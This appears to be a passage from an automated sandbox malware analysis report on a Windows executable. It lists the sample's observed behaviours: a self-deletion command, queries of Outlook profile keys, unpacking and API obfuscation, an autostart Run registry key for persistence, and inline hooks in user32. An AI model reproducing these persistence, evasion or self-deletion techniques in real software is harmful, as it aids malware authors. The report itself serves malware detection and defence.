 Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Uses an in-process (OLE) Automation server
 Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
 Writes ini files
 Checks if Microsoft Office is installed
 Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
 Binary contains paths to debug symbols
 Source: Binary string: explorer.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256223988.00000000009D0000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.483146175.000000000491F000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: R6o4qCis6s.exe, explorer.exe
 Source: Binary string: explorer.pdb source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp

### Data Obfuscation:

 Detected unpacking (changes PE section rights)
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Unpacked PE file: 1.2.R6o4qCis6s.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
 Contains functionality to dynamically determine API calls
 Uses code obfuscation techniques (call, push, ret)

### Boot Survival:

 Creates an undocumented autostart registry key
 Source: C:\Windows\SysWOW64\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9RFXABXP

### Hooking and other Techniques for Hiding and Protection:

 Modifies the prolog of user mode functions (user mode inline hooks)
 Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
 Contains functionality to check if a window is minimized (may be used to check if an application is visible)
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0045880C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428920 IsIconic,GetWindowPlacement,GetWindowRect,
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043ED90 IsIconic,GetCapture,
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043F638 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00455888 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
 Extensive use of GetProcAddress (often used to hide API calls)